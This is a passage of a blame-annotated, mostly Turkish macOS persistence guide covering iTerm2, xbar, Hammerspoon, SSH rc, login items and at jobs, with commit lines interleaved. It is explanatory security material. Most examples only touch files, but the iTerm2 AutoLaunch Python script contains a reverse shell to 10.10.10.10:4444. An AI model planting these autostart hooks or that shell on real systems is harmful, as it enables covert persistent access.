 								echo '* * * * * /bin/bash -c "touch /tmp/cron3"' > /tmp/cron
 								crontab /tmp/cron
 								```
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								### iTerm2
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Açıklama: [https://theevilbit.github.io/beyond/beyond\_0002/](https://theevilbit.github.io/beyond/beyond\_0002/)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* TCC atlatma: [✅](https://emojipedia.org/check-mark-button)
 								* iTerm2, TCC izinlerine sahip olabilir
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konumlar
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								* **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **Tetikleyici**: iTerm aç
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								* **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **Tetikleyici**: iTerm aç
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								* **`~/Library/Preferences/com.googlecode.iterm2.plist`**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **Tetikleyici**: iTerm aç
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama ve Sömürü
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								**`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`** konumunda depolanan betikler çalıştırılacaktır. Örneğin:
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								```bash
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" << EOF
 								#!/bin/bash
 								touch /tmp/iterm2-autolaunch
 								EOF
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								chmod +x "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh"
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								## macOS Auto-Start Locations
 								### Launch Agents
 								Launch Agents are used to run processes when a user logs in. They are stored in the following locations:
 								- `/Library/LaunchAgents/`
 								- `/System/Library/LaunchAgents/`
 								- `/Users/username/Library/LaunchAgents/`
 								### Launch Daemons
 								Launch Daemons are used to run processes at system startup. They are stored in the following locations:
 								- `/Library/LaunchDaemons/`
 								- `/System/Library/LaunchDaemons/`
 								### Login Items
 								Login Items are applications that open when a user logs in. They can be managed in:
 								- `System Preferences > Users & Groups > Login Items`
 								### Startup Items
 								Startup Items are legacy items that automatically launch when a user logs in. They are stored in:
 								- `/Library/StartupItems/`
 								### Cron Jobs
 								Cron Jobs are scheduled tasks that run at specific times. They can be viewed and managed using the `crontab` command.
-												GITBOOK-4146: change request with no subject merged in GitBook

											
										
										
											2023-11-02 16:52:21 +00:00
+								```bash
 								cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.py" << EOF
 								#!/usr/bin/env python3
 								import iterm2,socket,subprocess,os
 								async def main(connection):
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['zsh','-i']);
 								async with iterm2.CustomControlSequenceMonitor(
 								connection, "shared-secret", r'^create-window$') as mon:
 								while True:
 								match = await mon.async_get()
 								await iterm2.Window.async_create(connection)
-												GITBOOK-4146: change request with no subject merged in GitBook

											
										
										
											2023-11-02 16:52:21 +00:00
 								iterm2.run_forever(main)
 								EOF
 								```
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Betik **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`** de yürütülecektir:
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								```bash
 								do shell script "touch /tmp/iterm2-autolaunchscpt"
 								```
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								**`~/Library/Preferences/com.googlecode.iterm2.plist`** konumundaki iTerm2 tercihleri, iTerm2 terminali açıldığında **çalıştırılacak bir komutu belirtebilir**.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Bu ayar, iTerm2 ayarlarında yapılandırılabilir:
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								<figure><img src="../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Ve komut tercihlere yansıtılır:
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								```bash
 								plutil -p com.googlecode.iterm2.plist
 								{
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								[...]
 								"New Bookmarks" => [
 => {
 								[...]
 								"Initial Text" => "touch /tmp/iterm-start-command"
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Komutun çalıştırılacağı şekli ayarlayabilirsiniz:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								{% code overflow="wrap" %}
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```bash
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								# Add
 								/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" 'touch /tmp/iterm-start-command'" $HOME/Library/Preferences/com.googlecode.iterm2.plist
 								# Call iTerm
 								open /Applications/iTerm.app/Contents/MacOS/iTerm2
 								# Remove
 								/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" ''" $HOME/Library/Preferences/com.googlecode.iterm2.plist
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								{% endcode %}
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								{% hint style="warning" %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								İTerm2 tercihlerini kötüye kullanmak için **başka yolların** yüksek olasılıkla olduğu düşünülmektedir.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								{% endhint %}
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								### xbar
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Açıklama: [https://theevilbit.github.io/beyond/beyond\_0007/](https://theevilbit.github.io/beyond/beyond\_0007/)
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
 								* Ancak xbar yüklü olmalı
 								* TCC atlatma: [✅](https://emojipedia.org/check-mark-button)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Erişilebilirlik izni istiyor
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								* **`~/Library/Application\ Support/xbar/plugins/`**
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Tetikleyici**: xbar çalıştırıldığında
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama
-												GITBOOK-4224: change request with no subject merged in GitBook

											
										
										
											2023-12-29 13:55:22 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Eğer popüler program [**xbar**](https://github.com/matryer/xbar) yüklü ise, xbar başlatıldığında çalıştırılacak bir kabuk betiği **`~/Library/Application\ Support/xbar/plugins/`** dizininde yazılabilir:
-												GITBOOK-4224: change request with no subject merged in GitBook

											
										
										
											2023-12-29 13:55:22 +00:00
+								```bash
 								cat > "$HOME/Library/Application Support/xbar/plugins/a.sh" << EOF
 								#!/bin/bash
 								touch /tmp/xbar
 								EOF
 								chmod +x "$HOME/Library/Application Support/xbar/plugins/a.sh"
 								```
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								### Hammerspoon
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								**Açıklama**: [https://theevilbit.github.io/beyond/beyond\_0008/](https://theevilbit.github.io/beyond/beyond\_0008/)
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Ancak Hammerspoon yüklü olmalı
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* TCC atlatma: [✅](https://emojipedia.org/check-mark-button)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Erişilebilirlik izinleri istiyor
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
 								* **`~/.hammerspoon/init.lua`**
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Tetikleyici**: Hammerspoon çalıştırıldığında
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								[**Hammerspoon**](https://github.com/Hammerspoon/hammerspoon), işlemleri için **LUA betik dili**ni kullanan bir otomasyon platformu olarak **macOS** için hizmet verir. Özellikle, tam AppleScript kodunun entegrasyonunu destekler ve kabuk betiklerinin yürütülmesini sağlayarak betikleme yeteneklerini önemli ölçüde artırır.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Uygulama, tek bir dosya olan `~/.hammerspoon/init.lua` dosyasını arar ve betik başlatıldığında yürütülür.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								```bash
-												GITBOOK-4224: change request with no subject merged in GitBook

											
										
										
											2023-12-29 13:55:22 +00:00
+								mkdir -p "$HOME/.hammerspoon"
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								cat > "$HOME/.hammerspoon/init.lua" << EOF
-												GITBOOK-4224: change request with no subject merged in GitBook

											
										
										
											2023-12-29 13:55:22 +00:00
+								hs.execute("/Applications/iTerm.app/Contents/MacOS/iTerm2")
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								EOF
 								```
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								### BetterTouchTool
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Kullanışlıdır çünkü kum havuzunu atlar: [✅](https://emojipedia.org/check-mark-button)
 								* Ancak BetterTouchTool yüklü olmalıdır
 								* TCC atlatma: [✅](https://emojipedia.org/check-mark-button)
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* Otomasyon-Kısayolları ve Erişilebilirlik izinleri istiyor
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
 								#### Konum
 								* `~/Library/Application Support/BetterTouchTool/*`
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Bu araç, bazı kısayollar basıldığında uygulamaları veya betikleri yürütmek için gösterge koymayı sağlar. Bir saldırgan, kendi **kısayolunu ve eylemini yürütmek için veritabanında yapılandırabilir** ve keyfi kod yürütebilir (bir kısayol sadece bir tuşa basmak olabilir).
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
 								### Alfred
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Kullanışlıdır çünkü kum havuzunu atlar: [✅](https://emojipedia.org/check-mark-button)
 								* Ancak Alfred yüklü olmalıdır
 								* TCC atlatma: [✅](https://emojipedia.org/check-mark-button)
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* Otomasyon, Erişilebilirlik ve hatta Tam Disk erişimi izinleri istiyor
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
 								#### Konum
 								* `???`
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Belirli koşullar karşılandığında kod yürütebilen iş akışları oluşturmayı sağlar. Bir saldırganın bir iş akışı dosyası oluşturup Alfred'ın bunu yüklemesini sağlaması potansiyel olarak mümkündür (iş akışlarını kullanabilmek için premium sürümü kullanmak gereklidir).
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								### SSHRC
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Açıklama: [https://theevilbit.github.io/beyond/beyond\_0006/](https://theevilbit.github.io/beyond/beyond\_0006/)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Kullanışlıdır çünkü kum havuzunu atlar: [✅](https://emojipedia.org/check-mark-button)
 								* Ancak ssh etkinleştirilmiş ve kullanılmış olmalıdır
 								* TCC atlatma: [✅](https://emojipedia.org/check-mark-button)
 								* SSH'nin FDA erişimine sahip olması gerekmektedir
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
 								* **`~/.ssh/rc`**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **Tetikleyici**: SSH üzerinden oturum açma
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								* **`/etc/ssh/sshrc`**
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Root gereklidir
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **Tetikleyici**: SSH üzerinden oturum açma
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4224: change request with no subject merged in GitBook

											
										
										
											2023-12-29 13:55:22 +00:00
+								{% hint style="danger" %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								SSH'yi açmak için Tam Disk Erişimi gereklidir:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```bash
-												GITBOOK-4224: change request with no subject merged in GitBook

											
										
										
											2023-12-29 13:55:22 +00:00
+								sudo systemsetup -setremotelogin on
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```
-												GITBOOK-4224: change request with no subject merged in GitBook

											
										
										
											2023-12-29 13:55:22 +00:00
+								{% endhint %}
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama ve Sömürü
-												GITBOOK-4224: change request with no subject merged in GitBook

											
										
										
											2023-12-29 13:55:22 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								Varsayılan olarak, `/etc/ssh/sshd_config` dosyasında `PermitUserRC no` belirtilmediği sürece, bir kullanıcı **SSH üzerinden giriş yaptığında** **`/etc/ssh/sshrc`** ve **`~/.ssh/rc`** betikleri çalıştırılacaktır.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								### **Giriş Öğeleri**
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Açıklama: [https://theevilbit.github.io/beyond/beyond\_0003/](https://theevilbit.github.io/beyond/beyond\_0003/)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Ancak `osascript`'i argümanlarla çalıştırmanız gerekmektedir
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konumlar
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								* **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`**
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* **Tetikleyici:** Giriş
 								* Sömürü yükü, **`osascript`** çağrısıyla depolanmıştır
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								* **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`**
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* **Tetikleyici:** Giriş
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Root gereklidir
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								Sistem Tercihleri -> Kullanıcılar ve Gruplar -> **Giriş Öğeleri**'nde, **kullanıcı oturum açtığında çalıştırılacak öğeleri** bulabilirsiniz.\
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Onları komut satırından listelemek, eklemek ve kaldırmak mümkündür:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```bash
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								#List all items:
 								osascript -e 'tell application "System Events" to get the name of every login item'
 								#Add an item:
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/itemname", hidden:false}'
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
 								#Remove an item:
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								osascript -e 'tell application "System Events" to delete login item "itemname"'
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Bu öğeler **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`** dosyasında saklanır.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								**Giriş öğeleri** ayrıca [SMLoginItemSetEnabled](https://developer.apple.com/documentation/servicemanagement/1501557-smloginitemsetenabled?language=objc) API'sini kullanarak belirtilebilir, bu da yapılandırmayı **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`** dosyasında saklayacaktır.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								### ZIP olarak Giriş Öğesi
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								(Giriş Öğeleri hakkında önceki bölüme bakın, bu bir uzantıdır)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Eğer bir **ZIP** dosyasını bir **Giriş Öğesi** olarak saklarsanız, **`Archive Utility`** onu açacak ve örneğin ZIP dosyası **`~/Library`** içinde saklanmış ve **`LaunchAgents/file.plist`** adlı bir arka kapı içeren bir Klasör içeriyorsa (varsayılan olarak değil), o klasör oluşturulacak ve plist eklenecektir, böylece kullanıcı bir dahaki sefer oturum açtığında, **plist'te belirtilen arka kapı yürütülecektir**.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Başka bir seçenek, **`.bash_profile`** ve **`.zshenv`** dosyalarını kullanıcı HOME içine oluşturmaktır, böylece LaunchAgents klasörü zaten varsa bu teknik yine de çalışacaktır.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								### At
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Açıklama: [https://theevilbit.github.io/beyond/beyond\_0014/](https://theevilbit.github.io/beyond/beyond\_0014/)
-												GITBOOK-4226: change request with no subject merged in GitBook

											
										
										
											2023-12-30 00:49:26 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Ancak **`at`**'ı **çalıştırmanız** ve etkin olması **gerekmektedir**
 								* TCC atlaması: [🔴](https://emojipedia.org/large-red-circle)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **`at`**'ı **çalıştırmanız** ve etkin olması **gerekmektedir**
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### **Açıklama**
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								`at` görevleri, belirli zamanlarda yürütülmek üzere **tek seferlik görevlerin zamanlamasını** sağlamak için tasarlanmıştır. Cron işleri gibi, `at` görevleri otomatik olarak yürütmeden sonra kaldırılır. Bu görevlerin sistem yeniden başlatmaları arasında kalıcı olduğunu unutmamak önemlidir, bu da onları belirli koşullar altında potansiyel güvenlik endişeleri olarak işaretler.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								**Varsayılan olarak** devre dışı bırakılmışlardır ancak **root** kullanıcısı bunları **etkinleştirebilir**.
-												GITBOOK-4101: change request with no subject merged in GitBook

